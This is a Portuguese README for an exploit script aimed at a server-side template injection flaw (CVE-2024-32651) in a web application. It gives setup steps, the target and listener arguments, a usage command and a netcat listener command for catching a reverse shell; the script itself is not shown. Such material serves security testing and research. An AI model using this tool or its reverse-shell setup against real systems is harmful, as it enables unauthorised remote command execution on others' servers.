
Exploit de Injeção de Template no Lado do Servidor
Exploração de Injeção de Modelo no Lado do Servidor (SSTI)!!
Execução Remota de Código via Injeção de Modelo no Lado do Servidor (SSTI) em Aplicação Web Vulnerável
Este exploit tem como alvo uma aplicação web vulnerável a Injeção de Modelo no Lado do Servidor (SSTI). Ao explorar esta vulnerabilidade, um atacante pode executar comandos arbitrários no servidor. O script Python fornecido automatiza o processo de exploração ao enviar um payload que aciona uma shell reversa.
Para reproduzir a vulnerabilidade, execute o script Python fornecido contra a aplicação web vulnerável. Certifique-se de que você tenha um listener (por exemplo, nc -lvp 9999) em execução para capturar a conexão da shell reversa.
Salve o script em um arquivo chamado CVE-2024-32651.py.
Instale as bibliotecas Python necessárias se ainda não estiverem instaladas:
pip install requests beautifulsoup4
Para usar o script, forneça os seguintes argumentos de linha de comando:
--url: URL base da aplicação web vulnerável (por exemplo, http://10.10.10.10:5000).--port: Porta do listener (por exemplo, 9999).--ip: Endereço IP do listener (por exemplo, 10.10.50.22).--notification: (Opcional) URL de notificação se você quiser usar uma URL de notificação específica.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Esta versão corrigida do exploit foi baseada em um exploit original publicado por Zach Crosman (zcrosman) com o EDB-ID: 52027. Você pode visualizar o exploit original aqui. Agradeço a Zach Crosman por sua contribuição para a comunidade de segurança.